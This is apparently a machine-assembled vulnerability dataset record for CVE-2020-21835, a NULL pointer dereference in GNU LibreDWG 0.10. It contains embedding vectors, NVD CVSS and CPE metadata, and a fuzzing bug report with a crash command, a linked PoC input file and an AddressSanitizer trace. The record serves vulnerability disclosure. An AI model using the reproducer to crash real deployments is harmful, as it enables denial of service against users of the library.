-0.006001540459692478, -0.020412523299455643, 0.008296128362417221, -0.00008245542267104611, -0.04056604206562042, 0.010311480611562729, 0.008283987641334534, 0.0176282599568367, -0.000634350290056318, -0.0032921466045081615, 0.0056332736276090145, 0.017077883705496788, 0.03409101814031601, -0.011501266621053219, 0.003947743214666843, 0.0005121847498230636, -0.006940419320017099, -0.007486749906092882, 0.0056616016663610935, 0.010732357390224934, 0.0007866146042943001, 0.008595597930252552, 0.0043746898882091045, 0.0003047815407626331, -0.001821101293899119, -0.004459674935787916, 0.004415159113705158, -0.0037352810613811016, -0.0012960170861333609, 0.0013263687724247575, 0.011088483966886997, 0.0024200412444770336, 0.01145270373672247, 0.016106629744172096, 0.02910524606704712, -0.0003242572129238397, 0.005572570022195578, -0.024184225127100945, 0.01777394860982895, 0.017320696264505386, -0.004710582084953785, -0.014212683774530888, -0.0002234643034171313, 0.001313216402195394, 0.01884232833981514, 0.001096707652322948, -0.01902039162814617, 0.027615990489721298, -0.02340722270309925, -0.008352784439921379, 0.007563640829175711, 0.026838986203074455, 0.0060581970028579235, 0.029137620702385902, 0.005224537570029497, -0.005762774031609297, -0.009364508092403412, -0.0003925485070794821, 0.01613900437951088 ]
1,780
CVE-2020-21835
2021-05-17T21:15:07.433000
A null pointer deference issue exists in GNU LibreDWG 0.10 via read_2004_compressed_section ../../src/decode.c:2337.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 6.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ] }
[ { "source": "cve@mitre.org", "tags": [ "Not Applicable" ], "url": "http://gnu.com" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/LibreDWG/libredwg/issues/188#issuecomment-574493046" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:gnu:libredwg:0.10:*:*:*:*:*:*:*", "matchCriteriaId": "C3E7D34E-1D80-4CF0-8110-412C6D8514EF", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/LibreDWG/libredwg/issues/188#issuecomment-574493046
[ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "LibreDWG", "libredwg" ]
Hi, After fuzzing libredwg, I found the following bugs on the latest commit on master. Command: ./dwgbmp $PoC **1.NULL pointer dereference in read_2004_compressed_section ../../src/decode.c:2417** POC: https://github.com/linhlhq/research/blob/master/PoCs/libreDWG_4c26d37/id:000012%2Csig:06%2Csrc:002489%2Cop:havoc%2Crep:16 ``` ================================================================= ==20486==ERROR: AddressSanitizer: SEGV on unknown address 0x62904165558b (pc 0x7fa1bce115c5 bp 0x7fff8e06b350 sp 0x7fff8e06aab8 T0) ==20486==The signal is caused by a READ memory access. #0 0x7fa1bce115c4 (/lib/x86_64-linux-gnu/libc.so.6+0xbb5c4) #1 0x7fa1bd55e6ce (/usr/lib/x86_64-linux-gnu/libasan.so.4+0x796ce) #2 0x5634364fc7b6 in memcpy /usr/include/x86_64-linux-gnu/bits/string_fortified.h:34 #3 0x5634364fc7b6 in read_2004_compressed_section ../../src/decode.c:2417 #4 0x563436ac5dd2 in read_2004_section_summary ../../src/decode.c:2785 #5 0x563436ac5dd2 in decode_R2004 ../../src/decode.c:3352 #6 0x563436ad208d in dwg_decode ../../src/decode.c:246 #7 0x563436464fae in dwg_read_file ../../src/dwg.c:211 #8 0x5634364639d0 in get_bmp ../../programs/dwgbmp.c:111 #9 0x563436463066 in main ../../programs/dwgbmp.c:280 #10 0x7fa1bcd77b96 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21b96) #11 0x5634364636c9 in _start (/home/user/linhlhq/libredwg/asan_build/programs/dwgbmp+0x28f6c9) AddressSanitizer can not provide additional info. SUMMARY: AddressSanitizer: SEGV (/lib/x86_64-linux-gnu/libc.so.6+0xbb5c4) ```
Several bugs found by fuzzing
https://api.github.com/repos/LibreDWG/libredwg/issues/188/comments
15
2020-01-15T04:37:59
2020-01-16T23:22:04Z
https://github.com/LibreDWG/libredwg/issues/188
549,961,224
188
true
This is a GitHub Issue repo:libredwg owner:LibreDWG Title : Several bugs found by fuzzing Issue date: --- start body --- Hi, After fuzzing libredwg, I found the following bugs on the latest commit on master. Command: ./dwgbmp $PoC **1.NULL pointer dereference in read_2004_compressed_section ../../src/decode.c:2417** POC: https://github.com/linhlhq/research/blob/master/PoCs/libreDWG_4c26d37/id:000012%2Csig:06%2Csrc:002489%2Cop:havoc%2Crep:16 ``` ================================================================= ==20486==ERROR: AddressSanitizer: SEGV on unknown address 0x62904165558b (pc 0x7fa1bce115c5 bp 0x7fff8e06b350 sp 0x7fff8e06aab8 T0) ==20486==The signal is caused by a READ memory access. #0 0x7fa1bce115c4 (/lib/x86_64-linux-gnu/libc.so.6+0xbb5c4) #1 0x7fa1bd55e6ce (/usr/lib/x86_64-linux-gnu/libasan.so.4+0x796ce) #2 0x5634364fc7b6 in memcpy /usr/include/x86_64-linux-gnu/bits/string_fortified.h:34 #3 0x5634364fc7b6 in read_2004_compressed_section ../../src/decode.c:2417 #4 0x563436ac5dd2 in read_2004_section_summary ../../src/decode.c:2785 #5 0x563436ac5dd2 in decode_R2004 ../../src/decode.c:3352 #6 0x563436ad208d in dwg_decode ../../src/decode.c:246 #7 0x563436464fae in dwg_read_file ../../src/dwg.c:211 #8 0x5634364639d0 in get_bmp ../../programs/dwgbmp.c:111 #9 0x563436463066 in main ../../programs/dwgbmp.c:280 #10 0x7fa1bcd77b96 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21b96) #11 0x5634364636c9 in _start (/home/user/linhlhq/libredwg/asan_build/programs/dwgbmp+0x28f6c9) AddressSanitizer can not provide additional info. SUMMARY: AddressSanitizer: SEGV (/lib/x86_64-linux-gnu/libc.so.6+0xbb5c4) ``` --- end body ---
1,738
[ -0.0173491258174181, 0.02180103212594986, -0.004581322893500328, 0.015263681299984455, 0.05114516243338585, 0.05428072437644005, -0.017452659085392952, 0.04490362107753754, -0.01922750473022461, 0.027791140601038933, -0.012009795755147934, 0.0011518015526235104, 0.011965423822402954, 0.012283417396247387, -0.011181533336639404, 0.014442814514040947, -0.0032982565462589264, 0.007720582652837038, -0.023339232429862022, -0.02746575139462948, 0.027746768668293953, -0.00546135101467371, -0.017275173217058182, 0.020647382363677025, -0.025306355208158493, 0.004337281454354525, -0.0061417086981236935, -0.007668816484510899, -0.018044274300336838, 0.017363915219902992, 0.013880779966711998, 0.02245181053876877, 0.017689304426312447, 0.0007404438219964504, 0.03768590837717056, -0.010619498789310455, 0.04404577612876892, 0.06025604158639908, 0.013355720788240433, 0.03440244495868683, 0.005646230652928352, -0.07377445697784424, -0.02149043418467045, 0.014361467212438583, -0.011810124851763248, -0.009029531851410866, 0.028989160433411598, 0.016239846125245094, -0.01336311548948288, -0.0019375408301129937, -0.011307251639664173, -0.017467448487877846, -0.035171542316675186, -0.07359696924686432, 0.04250757768750191, -0.017363915219902992, 0.0335741825401783, 0.02166791819036007, 0.004755110014230013, -0.006204567849636078, -0.018251338973641396, 0.030675265938043594, -0.0032002702355384827, 0.027746768668293953, 0.006825764197856188, 0.02079528570175171, -0.04008195176720619, 0.007520912680774927, -0.027524912729859352, -0.005783041939139366, 0.004363164771348238, -0.044637393206357956, -0.0045591373927891254, 0.02725868672132492, 0.021741870790719986, -0.006877530831843615, 0.011758359149098396, 0.011839705519378185, -0.016816671937704086, 0.02262929454445839, -0.013104284182190895, 0.042537156492471695, -0.03543777018785477, 0.01765972375869751, 0.007498726714402437, 0.006330286152660847, -0.022008098661899567, -0.08395024389028549, -0.006223055999726057, -0.045672718435525894, -0.0047181337140500546, 0.03070484660565853, 0.024581626057624817, -0.008859442546963692, 0.017260383814573288, -0.011018839664757252, -0.03999321162700653, -0.017423078417778015, -0.047950439155101776, -0.011225905269384384, -0.038484591990709305, -0.005649928469210863, -0.011329437606036663, 0.011625245213508606, 0.0320064015686512, 0.018325291574001312, 0.003255734220147133, -0.016594815999269485, 0.00611582538112998, 0.1128210797905922, 0.0015076951822265983, -0.008600611239671707, -0.03854375332593918, -0.006374657619744539, -0.006822066847234964, 0.009621147997677326, 0.03733094036579132, -0.007875882089138031, -0.05765293538570404, -0.024256236851215363, 0.0011323890648782253, -0.03221346437931061, -0.02847149781882763, 0.003993405029177666, -0.04809834435582161, 0.036295611411333084, 0.006655674893409014, -0.01731954514980316, -0.022821569815278053, -0.01327437348663807, -0.024448512122035027, -0.03659142181277275, 0.01770409569144249, -0.020691754296422005, 0.01022755354642868, 0.00416349433362484, -0.03005407005548477, 0.030852749943733215, 0.01626942679286003, 0.005527907516807318, -0.05709090083837509, -0.04138350859284401, 0.033692505210638046, -0.010878331027925014, -0.029639938846230507, 0.0005458577652461827, -0.04241883382201195, 0.011188928969204426, 0.002054015174508095, -0.011026234365999699, -0.017674515023827553, -0.02459641546010971, 0.010175786912441254, 0.03165142983198166, 0.042625900357961655, -0.020248042419552803, 0.020174089819192886, 0.0454360730946064, 0.008866838179528713, -0.026356471702456474, 0.01848798617720604, -0.030764007940888405, 0.02576485648751259, -0.0360293872654438, -0.025454258546233177, -0.0004344676563050598, 0.017600562423467636, 0.022481391206383705, -0.00589766725897789, 0.02524719387292862, 0.0007677135872654617, -0.016461702063679695, 0.027273476123809814, 0.01805906370282173, -0.05892490595579147, 0.0026715139392763376, -0.011647431179881096, 0.020957980304956436, -0.014095240272581577, -0.013045122846961021, 0.003492380492389202, 0.007424775045365095, 0.01888732612133026, -0.0011268426897004247, 0.016757510602474213, 0.0047181337140500546, 0.0310006532818079, -0.005439165513962507, -0.006788788363337517, -0.034816574305295944, 0.004207865335047245, -0.00919962115585804, 0.004174587316811085, -0.023132167756557465, 0.041058119386434555, -0.019464151933789253, -0.04008195176720619, -0.01595882885158062, 0.01022755354642868, -0.01149213220924139, 0.007875882089138031, 0.011410784907639027, -0.020040975883603096, 0.014856944791972637, -0.006400540471076965, 0.002320242114365101, -0.015027035027742386, 0.04682637006044388, -0.0014494580682367086, -0.031681012362241745, -0.013156050816178322, -0.034165795892477036, 0.017763257026672363, -0.0052912612445652485, -0.025868389755487442, 0.002980263205245137, -0.015633439645171165, 0.029684308916330338, -0.03505321964621544, 0.0007136362255550921, 0.027377009391784668, -0.02157917618751526, 0.007202919106930494, 0.0030098441056907177, -0.07838905602693558, -0.010730426758527756, 0.007794534787535667, 0.01033848151564598, -0.04540649428963661, 0.0048401546664536, 0.03597022593021393, -0.029950536787509918, -0.008016390725970268, 0.01866547018289566, -0.025750067085027695, -0.010478990152478218, -0.0026696650311350822, 0.013984312303364277, -0.03017239272594452, 0.01739349588751793, 0.022688455879688263, 0.025188030675053596, -0.017127269878983498, -0.01774846576154232, 0.010959677398204803, 0.046500980854034424, -0.009502824395895004, -0.004267027135938406, -0.029196226969361305, 0.02759886533021927, 0.009990907274186611, -0.030556943267583847, 0.007683606818318367, 0.02267366461455822, 0.013636738061904907, -0.011070605367422104, 0.027850301936268806, 0.018473194912075996, -0.014339281246066093, -0.03724219650030136, 0.03780423104763031, 0.001213736250065267, -0.012098537757992744, -0.0009170040721073747, 0.007291661575436592, -0.01652086339890957, -0.03061610460281372, 0.021298158913850784, -0.01835487224161625, -0.0292110163718462, 0.04617559164762497, -0.014124820940196514, -0.0023461254313588142, -0.007121571805328131, -0.025128869339823723, 0.008238246664404869, 0.041235603392124176, 0.002532853977754712, -0.004636786878108978, 0.001617698697373271, -0.0014050869503989816, 0.027539703994989395, -0.019345827400684357, 0.010767403058707714, -0.009458453394472599, -0.01839924231171608, -0.009325339458882809, -0.028752515092492104, -0.032154303044080734, -0.009576776064932346, -0.0006313647027127445, 0.008290012367069721, -0.05362994968891144, -0.0036920506972819567, -0.012660572305321693, 0.03869165480136871, 0.013681109063327312, -0.012564434669911861, -0.05590766668319702, -0.0002549031050875783, -0.021993307396769524, -0.011943238787353039, -0.021401692181825638, -0.01879858411848545, -0.021091094240546227, -0.0024348676670342684, -0.01765972375869751, 0.020632591098546982, -0.01748223975300789, -0.007568981498479843, 0.020218461751937866, -0.04854205623269081, -0.008977766148746014, -0.029536405578255653, -0.025750067085027695, -0.007228802423924208, 0.015796134248375893, -0.04679678753018379, -0.011085395701229572, 0.0024367165751755238, -0.04351332411170006, -0.004755110014230013, -0.033071309328079224, 0.006015990395098925, 0.03934243321418762, -0.03889872133731842, 0.00578673928976059, 0.04972528666257858, -0.054014500230550766, 0.024211864918470383, 0.014575927518308163, -0.018147805705666542, -0.0045369514264166355, -0.01550032664090395, -0.003540449310094118, -0.04863079637289047, -0.051263485103845596, 0.023561088368296623, 0.016506073996424675, -0.0035885178949683905, -0.012068957090377808, 0.025824017822742462, 0.0018968672957271338, -0.006145406514406204, 0.007964624091982841, -0.02974347025156021, 0.008925999514758587, -0.020869238302111626, 0.019508522003889084, -0.011092791333794594, 0.001015914836898446, 0.04937031492590904, -0.020529059693217278, 0.037833813577890396, -0.0009687704150564969, -0.028308803215622902, 0.002891520969569683, -0.04715175926685333, 0.012571830302476883, -0.0031392599921673536, 0.002726977923884988, -0.01327437348663807, 0.0005370759754441679, 0.002908160211518407, 0.011233299970626831, 0.011654825881123543, 0.008334384299814701, 0.005635138135403395, -0.0032927102874964476, -0.001225753454491496, -0.03440244495868683, 0.0557301826775074, -0.0380408801138401, -0.02913706563413143, -0.018650678917765617, -0.0262973103672266, 0.025099288672208786, 0.023383604362607002, -0.0335741825401783, 0.004418628755956888, -0.04218218848109245, -0.009916955605149269, -0.0027491634245961905, -0.03614770993590355, 0.029639938846230507, 0.034432023763656616, -0.022333486005663872, 0.03863249346613884, -0.023294862359762192, -0.028752515092492104, -0.008371359668672085, 0.06519602984189987, -0.007121571805328131, -0.04626433551311493, 0.011640035547316074, 0.04135392606258392, -0.010294110514223576, -0.0048142713494598866, 0.009081298485398293, -0.034343283623456955, -0.019478941336274147, 0.011980214156210423, -0.01452416181564331, -0.009746866300702095, 0.020484687760472298, 0.03496447950601578, 0.009813422337174416, -0.014309700578451157, 0.01848798617720604, 0.013888174667954445, 0.00359776197001338, -0.018680261448025703, -0.0027695002499967813, 0.005546395666897297, 0.052831266075372696, 0.015034429728984833, -0.007668816484510899, 0.01450197584927082, -0.01452416181564331, -0.010101835243403912, 0.0026752115227282047, -0.01238695066422224, 0.012741919606924057, 0.011418179608881474, 0.0075357030145823956, 0.023738574236631393, -0.012793686240911484, 0.016905413940548897, 0.016668768599629402, -0.035999804735183716, -0.003338930197060108, 0.024315398186445236, 0.006969970650970936, 0.03318963199853897, -0.022303905338048935, -0.043542902916669846, -0.01857672818005085, -0.026075454428792, -0.008792885579168797, 0.007202919106930494, 0.0018811525078490376, 0.044844456017017365, -0.0240639615803957, -0.005073103122413158, -0.011921052820980549, -0.029595566913485527, -0.0465601421892643, 0.003941638395190239, 0.015751764178276062, -0.03957907855510712, 0.0011943238787353039, 0.030009698122739792, -0.03632519394159317, 0.0020225855987519026, 0.0031115279998630285, -0.018606308847665787, -0.05203258618712425, 0.003457253333181143, 0.028796887025237083, 0.008571029640734196, -0.01181752048432827, 0.019552893936634064, -0.024211864918470383, -0.0047403196804225445, 0.020647382363677025, 0.03741968423128128, 0.046500980854034424, -0.039490338414907455, 0.001689801923930645, -0.005668416153639555, -0.013829013332724571, 0.018251338973641396, 0.01788157969713211, -0.008386150002479553, 0.001810898189432919, 0.020292412489652634, -0.024788690730929375, 0.003908359911292791, -0.010146206244826317, -0.012061561457812786, 0.004289212636649609, -0.04091021418571472, -0.004821666516363621, -0.02822006121277809, 0.02690371684730053, -0.02083965763449669, 0.0525946207344532, 0.015263681299984455, 0.023620249703526497, 0.04203428328037262, -0.003207665402442217, 0.016062362119555473, -0.027377009391784668, -0.049459058791399, 0.0023128469474613667, 0.030246343463659286, -0.013370511122047901, -0.034994058310985565, 0.04037776216864586, 0.02005576714873314, 0.02869335375726223, -0.0008167067426256835, 0.026356471702456474, 0.00010902134090429172, 0.03419537842273712, -0.0164469126611948, -0.029063113033771515, 0.0018321593524888158, -0.0014753412688151002, -0.035556092858314514, 0.010508570820093155, -0.023842105641961098, 0.002726977923884988, -0.05709090083837509, -0.007609654683619738, -0.01674271933734417, 0.002150152809917927, 0.00821606069803238, 0.010109230875968933, 0.009961326606571674, -0.01656523533165455, -0.031030235812067986, -0.004906711168587208, 0.04670804738998413, 0.015278471633791924, 0.014147006906569004, -0.003521961160004139, -0.007361915893852711, 0.0224961806088686, -0.014213562943041325, -0.003290861379355192, -0.003222455969080329, -0.012120723724365234, 0.03724219650030136, -0.00913306511938572, 0.01609194278717041, -0.011543897911906242, 0.030113231390714645, 0.007121571805328131, -0.01591445878148079, -0.018961278721690178, 0.024966174736618996, -0.03706471249461174, 0.0005463199922814965, -0.015027035027742386, 0.017289964482188225, -0.020040975883603096, 0.03511238098144531, 0.002061410341411829, -0.012239046394824982, -0.004377955105155706, -0.006773998029530048, -0.0026456306222826242, 0.00044394275755621493, -0.006126918364316225, 0.009939140640199184, -0.004795783665031195, -0.0005121171707287431, 0.029284968972206116, 0.005705392453819513, 0.021031932905316353, -0.0005980863352306187, 0.023649830371141434, -0.004359466955065727, 0.012852847576141357, 0.004193075001239777, -0.0175709817558527, 0.028856048360466957, -0.03750842437148094, -0.03082316927611828, 0.03363334387540817, 0.02166791819036007, 0.017260383814573288, -0.021120674908161163, -0.022570133209228516, 0.0054835365153849125, -0.025099288672208786, -0.00551681499928236, -0.001234073075465858, -0.03171059116721153, 0.013422277756035328, -0.04709259793162346, -0.011196323670446873, 0.016727929934859276, 0.014147006906569004, -0.02506970800459385, 0.007905462756752968, -0.017423078417778015, 0.03422495722770691, -0.011344227939844131, 0.0060455710627138615, -0.009317944757640362, -0.0016463551437482238, -0.0029636239632964134, 0.03070484660565853, 0.0057608564384281635, 0.00062535610049963, 0.013673714362084866, -0.009177436120808125, 0.003259431803599, -0.013207816518843174, 0.015781344845891, 0.017674515023827553, -0.020085347816348076, -0.03375166654586792, -0.0011758358450606465, 0.012187279760837555, -0.0057608564384281635, -0.024344978854060173, 0.01705331727862358, 0.034343283623456955, 0.0016851798864081502, 0.0709347054362297, -0.002653026022017002, 0.02088402770459652, -0.00022174027981236577, 0.0012294510379433632, 0.01066386979073286, -0.02407875284552574, 0.010427223518490791, 0.016594815999269485, -0.04241883382201195, 0.013673714362084866, 0.01996702514588833, 0.015204519033432007, 0.03227262571454048, 0.007239894941449165, -0.02407875284552574, -0.011026234365999699, -0.0055685811676084995, -0.026918506249785423, 0.01879858411848545, 0.012046771124005318, -0.022185582667589188, -0.02083965763449669, 0.035556092858314514, 0.04673762619495392, 0.0081125283613801, -0.014450209215283394, 0.014102634973824024, 0.011462550610303879, 0.000024251037757494487, -0.009451057761907578, 0.013422277756035328, -0.027539703994989395, -0.005261680576950312, 0.0007487633847631514, 0.018118225038051605, 0.021253788843750954, 0.03496447950601578, -0.026075454428792, -0.014213562943041325, 0.000810698140412569, 0.01927187666296959, 0.019035229459404945, -0.015529908239841461, 0.025927551090717316, 0.03854375332593918, -0.0034831364173442125, 0.007214012090116739, 0.007572678849101067, -0.014309700578451157, -0.034994058310985565, 0.0010390247916802764, -0.011669616214931011, 0.001455928897485137, -0.03954949975013733, -0.001121296314522624, 0.0207065436989069, 0.019123971462249756, -0.0017600562423467636, -0.021268578246235847, 0.006674162577837706, -0.0012349974131211638, -0.011610454879701138, -0.002812022576108575, 0.003778944257646799, 0.01506401039659977, -0.030586523935198784, 0.005746066104620695, -0.004906711168587208, -0.0028767306357622147, -0.0005010244203731418, 0.004045171197503805, -0.030142812058329582, 0.010656475089490414, -0.007750163320451975, -0.010589918121695518, -0.02202288806438446, -0.03212472423911095, 0.020854447036981583, 0.0005236722063273191, 0.017718885093927383, 0.004570229910314083, 0.026193777099251747, -0.017985112965106964, 0.041620153933763504, -0.022570133209228516, -0.02493659406900406, 0.004514765925705433, -0.023087795823812485, -0.0004899316118098795, 0.008925999514758587, -0.008571029640734196, 0.012919404543936253, 0.010323691181838512, -0.007964624091982841, -0.010501176118850708, 0.032686758786439896, 0.00518772890791297, -0.023930847644805908, -0.00058884231839329, -0.03833668678998947, -0.018769003450870514, 0.004836456850171089, -0.016299007460474968, 0.013651528395712376, 0.002505121985450387, -0.0032816175371408463, 0.009554591029882431, -0.012527459301054478, -0.014583323150873184, 0.000007059377367113484, -0.043365418910980225, 0.00887423288077116, -0.01328176911920309, 0.005975316744297743, -0.008356569334864616, -0.010996653698384762, 0.009495429694652557, 0.009170040488243103, -0.019109182059764862, 0.005635138135403395, 0.014183982275426388, -0.02795383334159851, 0.005039824638515711, 0.008733724243938923, -0.019819119945168495, 0.014753412455320358, 0.004148703999817371, 0.003484985325485468, -0.00017320930783171207, 0.006326588802039623, -0.02049947902560234, -0.008741119876503944, -0.004976965487003326, 0.010449409484863281, 0.015884876251220703, -0.018369661644101143, 0.027391798794269562, 0.007875882089138031, 0.008474892936646938, 0.02354629896581173, -0.04046650230884552, -0.010057464241981506, -0.015574279241263866, 0.03203598037362099, -0.0320064015686512, -0.007262080907821655, -0.013111678883433342, -0.029063113033771515, 0.010745217092335224, -0.010974468663334846, 0.03292340412735939, 0.03218388557434082, -0.0004746790218632668, 0.01638774946331978, -0.030497780069708824, 0.015988409519195557, 0.008408335968852043, 0.033337537199258804, -0.008334384299814701, -0.00029950536554679275, -0.00471073854714632, 0.019419780001044273, -0.022185582667589188, 0.00935492105782032, 0.005224704742431641, 0.025824017822742462, 0.025750067085027695, -0.016151104122400284, -0.01441323384642601, -0.029536405578255653, 0.023294862359762192, 0.011765753850340843, -0.007480239029973745, 0.03375166654586792, -0.014472395181655884, -0.0008134713862091303, -0.0018857745453715324, -0.006126918364316225, -0.02493659406900406, 0.039697401225566864, -0.015248890034854412, -0.009096088819205761, -0.03336711600422859, 0.022910311818122864, 0.025927551090717316, -0.0010796983260661364, -0.022703247144818306, 0.03043861873447895, -0.006459702271968126, -0.03363334387540817, -0.024611206725239754, -0.006958877667784691, -0.023871686309576035, -0.044933199882507324, 0.03502364084124565, -0.024744320660829544, 0.026105035096406937, -0.006023385562002659, -0.00944366306066513, 0.018902115523815155, 0.03771549090743065, -0.004377955105155706, 0.002532853977754712, 0.0018746816786006093, -0.017999902367591858, 0.0012553342385217547, 0.003433218924328685, -0.03008365072309971, 0.0016361867310479283, -0.008016390725970268, -0.05996023491024971, -0.00770579231902957, -0.03676890581846237, -0.0009724680567160249, 0.011869287118315697, 0.03413621708750725, 0.0054835365153849125, 0.0019005648791790009, -0.0023627644404768944, -0.017082897946238518, 0.0022370461374521255, 0.007310149259865284, 0.026326891034841537, 0.02307300642132759, -0.01112237200140953, -0.002290661446750164, 0.046678464859724045, -0.02576485648751259, -0.005612952634692192, -0.015034429728984833, -0.010197972878813744, -0.02206725999712944, -0.025971921160817146, -0.02477390132844448, 0.005224704742431641, 0.011765753850340843, 0.007428472395986319, 0.043631646782159805, 0.02891520969569683, -0.012882428243756294, -0.006884925998747349, -0.009939140640199184, 0.012734523974359035, 0.008134713396430016, -0.0036643187049776316, -0.0005652701365761459, -0.011085395701229572, 0.03262759745121002, -0.0057904371060431, -0.0061897775158286095, -0.006086244713515043, 0.0027454658411443233, 0.015455955639481544, -0.015781344845891, -0.032686758786439896, 0.000988182844594121, -0.01404347363859415, -0.035911064594984055, -0.024226656183600426, 0.016949785873293877, 0.009066508151590824, -0.023575879633426666, -0.03277549892663956, -0.011188928969204426, -0.013873384334146976, 0.023694202303886414, 0.030497780069708824, -0.012239046394824982, -0.004965872969478369, -0.0009267102577723563, 0.03206556290388107, 0.013266978785395622, -0.07892151176929474, 0.012268627062439919, -0.01967121660709381, -0.011432969942688942, -0.017955532297492027, 0.0045850202441215515, 0.028057366609573364, -0.05049438774585724, -0.03191765770316124, 0.03265717625617981, 0.038662075996398926, -0.0028249642346054316, -0.01897606812417507, -0.02909269370138645, -0.007398891728371382, -0.013917755335569382, -0.0031392599921673536, 0.03475741297006607, -0.025409886613488197, 0.003982312045991421, -0.01844361424446106, 0.03129646182060242, -0.0003355569497216493, 0.007313847076147795, 0.025306355208158493, 0.02010013721883297, -0.005509419832378626, 0.0002302909706486389, -0.03836626932024956, -0.022008098661899567, -0.003048668848350644, -0.04176805540919304, -0.0011277671437710524, 0.021179836243391037, 0.0642494484782219, 0.012283417396247387, -0.009865188971161842, -0.03247969225049019, 0.012024586088955402, -0.0073545207269489765, -0.03082316927611828, -0.03484615683555603, 0.011107581667602062, -0.0006651052972301841, 0.002972868038341403, 0.004200470168143511, -0.008755910210311413, 0.013045122846961021, 0.012068957090377808, 0.029462452977895737, 0.008519263938069344, 0.0064560044556856155, 0.004348373971879482, -0.008866838179528713, -0.0396086610853672, -0.017068108543753624, 0.015603859908878803, 0.028722934424877167, -0.018384452909231186, 0.0005463199922814965, 0.0027047921903431416, 0.0025920155458152294, -0.013865988701581955, -0.012527459301054478, -0.011462550610303879, -0.014102634973824024, -0.017423078417778015, -0.0035071708261966705, -0.012423926033079624, -0.010944887064397335, 0.019123971462249756, -0.019907861948013306, -0.011425575241446495, -0.0025476443115621805, 0.02502533793449402, 0.004629391711205244, 0.02350192703306675, -0.020440317690372467, -0.019582474604249, 0.00600859522819519, 0.03239095211029053, -0.04440074786543846, -0.01349622942507267, -0.02276240848004818, -0.020307203754782677, -0.013865988701581955, 0.007683606818318367, 0.0355856753885746, 0.019597264006733894, -0.015293261967599392, 0.024670368060469627, -0.017999902367591858, -0.013037727214396, -0.012808476574718952, 0.013599761761724949, -0.019833911210298538, 0.012209465727210045, 0.018680261448025703, -0.015130567364394665, -0.011484736576676369, -0.005161845590919256, 0.016890622675418854, 0.028072157874703407, -0.0026511771138757467, -0.020070556551218033, -0.006200870499014854, -0.001887623337097466, 0.031237300485372543, -0.030497780069708824, 0.0056758117862045765, -0.0007677135872654617, 0.0010103684617206454, -0.02611982636153698, -0.011943238787353039, 0.00954719539731741, -0.021431272849440575, -0.010220158845186234, 0.025409886613488197, -0.020174089819192886, -0.029270179569721222, 0.007147455122321844, -0.0112480903044343, 0.019523313269019127, 0.0005463199922814965, -0.005956829059869051, -0.004078449681401253, 0.0008726328960619867, 0.038307104259729385, -0.030098440125584602, 0.01731954514980316, -0.018961278721690178, -0.02647479437291622, 0.006559537257999182, 0.003804827341809869, 0.03061610460281372, -0.026874136179685593, 0.0018931697122752666, -0.009702494367957115, -0.0054465606808662415, 0.010271924547851086, 0.011418179608881474, -0.005964224226772785, -0.019552893936634064, 0.02576485648751259, -0.0018118225270882249, -0.007742768153548241, 0.010944887064397335, 0.0028305104933679104, 0.0070291319862008095, -0.017363915219902992, 0.0009484336478635669, 0.018295710906386375, -0.01530805230140686, -0.02146085351705551, 0.01203198079019785, 0.049074508249759674, -0.002928496804088354, -0.029728680849075317, 0.0038455009926110506, -0.00913306511938572, 0.01251266896724701, -0.0015955131966620684, -0.004721831530332565, 0.018783792853355408, -0.03511238098144531, 0.021860193461179733, 0.010316295549273491, 0.04259631782770157, -0.020484687760472298, -0.009118274785578251, 0.0036051571369171143, 0.00003246952474000864, -0.019434571266174316, 0.01112237200140953, -0.006637186743319035, -0.018561936914920807, -0.02481827139854431, 0.0068479496985673904, -0.02804257720708847, -0.028397545218467712, -0.014080449938774109, -0.002617898862808943, 0.010671265423297882, -0.004832759499549866, -0.006030780728906393, -0.006859042681753635, 0.03327837213873863, -0.02529156394302845, -0.0036273428704589605, 0.040496084839105606, -0.02573527581989765, 0.011329437606036663, 0.000669727276545018, -0.021431272849440575, -0.03304172679781914, -0.01687583327293396, -0.005032429471611977, -0.0064560044556856155, 0.02010013721883297, -0.030675265938043594, 0.010397642850875854, 0.0164469126611948, -0.002078049583360553, 0.011891472153365612, 0.0062378463335335255, -0.02067696303129196, -0.009406686760485172, 0.013015542179346085, -0.01822175830602646, -0.018206968903541565, -0.011995005421340466, 0.0063709598034620285, 0.10158038884401321, -0.016017990186810493, 0.00312262075021863, -0.01993744447827339, 0.0031355624087154865, 0.008844652213156223, 0.0037641539238393307, 0.015455955639481544, -0.010907911695539951, -0.007476541213691235, 0.026223357766866684, -0.01962684467434883, -0.019079601392149925, 0.007720582652837038, 0.022525761276483536, -0.0008938941173255444, -0.01020536758005619, -0.019035229459404945, 0.03389957174658775, -0.009554591029882431, 0.025957131758332253, -0.005354120396077633, 0.014775598421692848, -0.02027762308716774, 0.025173241272568703, -0.001746190246194601, -0.03478699177503586, -0.021593967452645302, -0.012815871275961399, -0.0160032007843256, -0.0063339839689433575, -0.0013209665194153786, -0.013096888549625874, -0.011595664545893669, 0.0003697597130667418, 0.0011434819316491485, 0.021771451458334923, 